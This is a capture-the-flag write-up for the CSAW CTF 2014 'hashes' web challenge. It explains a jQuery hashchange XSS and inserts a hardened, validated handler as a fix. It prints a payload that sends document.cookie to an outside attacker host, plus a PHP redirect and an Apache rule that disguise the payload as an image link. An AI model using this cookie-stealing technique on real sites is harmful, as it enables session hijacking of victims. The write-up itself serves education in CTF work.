CSAW CTF 2014 - Web 300 - hashes

Steal the administrator cookie, which contains the flag, through an XSS vulnerability in jQuery.

Introduction

The goal of this challenge was to grab a cookie which contains the flag, but we don't know its value yet.
The target website had a form to submit links to pictures.

Find the vulnerability

After a quick look at the source code of the page, something became obvious: there is an XSS vulnerability caused by the jQuery code.

$(window).bind('hashchange', function(e) {
    $('.image').hide();
    // The URL fragment is passed straight to $(), which treats it as HTML/selector input
    tag = window.location.hash;
    $(tag).show();
});
tag = window.location.hash;
$(tag).show();

You can trigger a simple alert by adding some code to the URL.

http://54.86.199.163:7878/#<img src=x onerror=alert(1)>
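For comparison, here is a hardened replacement for the handler above. This is an added example, not code from the challenge or the original writeup: the fragment is validated against a plain element id and resolved with getElementById instead of being handed to $(), and the `doc`/`$` parameters are assumed wiring so it can run without a browser.

```javascript
// Hardened version of the hashchange handler (added example, not the challenge's code).
// jQuery before 1.9 treats any string containing '<tag>' as HTML, so passing
// window.location.hash to $() lets a crafted fragment create elements. Newer
// versions only parse HTML when the string starts with '<', but validating the
// fragment is the robust fix regardless of jQuery version.

// Accept only '#' followed by a conventional HTML id: a letter, then letters,
// digits, '-' or '_'. Markup, spaces, an empty hash etc. are rejected.
const SAFE_ID = /^#([A-Za-z][A-Za-z0-9_-]*)$/;

function idFromHash(hash) {
  const m = SAFE_ID.exec(hash || '');
  return m ? m[1] : null;
}

// Same behaviour as the original handler (hide all images, show the one
// named in the fragment), but the element is looked up by id, never by
// interpreting the fragment as a selector or HTML string.
// `doc` and `$` are injected (assumed wiring) so this runs outside a browser.
function showImageFromHash(hash, doc, $) {
  $('.image').hide();
  const id = idFromHash(hash);
  if (id === null) return false;          // fragment rejected, nothing shown
  const el = doc.getElementById(id);
  if (!el) return false;                  // unknown id, nothing shown
  $(el).show();
  return true;
}

// In the page this would be wired as:
//   $(window).bind('hashchange', () => showImageFromHash(window.location.hash, document, $));
//   showImageFromHash(window.location.hash, document, $);

// The payload from this writeup is rejected, a normal id is accepted:
console.log(idFromHash('#<img src=x onerror=alert(1)>')); // null
console.log(idFromHash('#img3'));                          // "img3"
```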

Exploit

As we said earlier, the goal of this challenge is to grab a cookie from the target machine. We are going to use the XSS vulnerability to do so.

This payload will bounce the target to the attacker's website with the cookie as a query argument.

#<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>

The problem is that we can't submit this URL because it is not an image. We created a PHP file, http://wiremask.eu/test.php, which redirects to our XSS.

<?php
    // Redirect the visiting browser to the vulnerable page with the XSS payload in the fragment
    header('Location: http://54.86.199.163:7878/#<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>');
    exit;
?>

We also created an Apache rule to redirect http://wiremask.eu/test.jpg to http://wiremask.eu/test.php.

Exploitation

The last step was to submit the fake link http://wiremask.eu/test.jpg.

The target will hit http://wiremask.eu/test.jpg, which is in fact http://wiremask.eu/test.php, and will then be redirected to the payload:

#<img src=x onerror=location.href=("http://wiremask.eu/test.php?c="+document.cookie)>

Finally, the XSS will redirect the target to http://wiremask.eu/test.php?c= with the cookie as the parameter value.

You can read the flag in your Apache access logs, or customize your PHP script to save the cookie to a file.